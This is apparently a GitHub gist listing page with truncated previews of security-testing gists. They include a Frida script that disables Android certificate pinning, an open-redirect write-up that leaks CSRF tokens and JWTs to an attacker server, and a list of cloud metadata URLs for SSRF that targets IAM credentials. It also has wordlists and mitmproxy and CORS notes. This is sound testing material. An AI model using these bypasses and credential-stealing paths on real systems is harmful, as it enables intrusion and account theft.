Skip to content

Instantly share code, notes, and snippets.

View adibdz's full-sized avatar

Muhamamd Adib Dzulfikar adibdz

View GitHub Profile
@approovm
approovm / 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Last active October 25, 2024 09:21
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system
@A1vinSmith
A1vinSmith / Privilege Escalation.md
Last active October 8, 2024 21:27
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)
@teknogeek
teknogeek / universalUnpin.js
Last active October 23, 2024 20:56
Frida Universal™ SSL Unpinner
Java.perform(function() {
console.log('\n[.] Cert Pinning Bypass');
// Create a TrustManager that trusts everything
console.log('[+] Creating a TrustyTrustManager that trusts everything...');
var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
var TrustyTrustManager = Java.registerClass({
name: 'com.example.TrustyTrustManager',
implements: [X509TrustManager],
methods: {
@rumansaleem
rumansaleem / clean-up-arch-linux.md
Created May 28, 2019 08:51
Instructions to clean up Arch Linux (Manjaro)

Contents

  • Clean pkg cache
  • Remove unused packages (orphans)
  • Clean cache in /home
  • remove old config files
  • Find and Remove
    • duplicates
    • empty files
    • empty directories
  • broken symlinks

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
@DaveYesland
DaveYesland / dirbrute.txt
Created April 6, 2019 20:43
List for directory brute forcing.
@
_
0
00
01
02
03
04
05
06
@franciscocpg
franciscocpg / README.md
Last active May 13, 2024 08:48
Import mitm certificate to CA in arch linux
  1. After installing mitmproxy run it (just type mitmproxy) in a terminal session and quit. This will create the necessaries certificates files at ~/.mitmproxy.

  2. Extract the certificate to .crt format:
    openssl x509 -in ~/.mitmproxy/mitmproxy-ca.pem -inform PEM -out ca.crt

  3. Trust the certificate into CA:
    sudo trust anchor ca.crt

  4. Run the mitmproxy again

@jhaddix
jhaddix / cloud_metadata.txt
Last active October 27, 2024 18:33 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active November 6, 2024 03:28
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@exAspArk
exAspArk / curl.sh
Last active November 5, 2024 16:07
Test CORS with cURL
curl -I -X OPTIONS \
-H "Origin: http://EXAMPLE.COM" \
-H 'Access-Control-Request-Method: GET' \
http://EXAMPLE.COM/SOMETHING 2>&1 | grep 'Access-Control-Allow-Origin'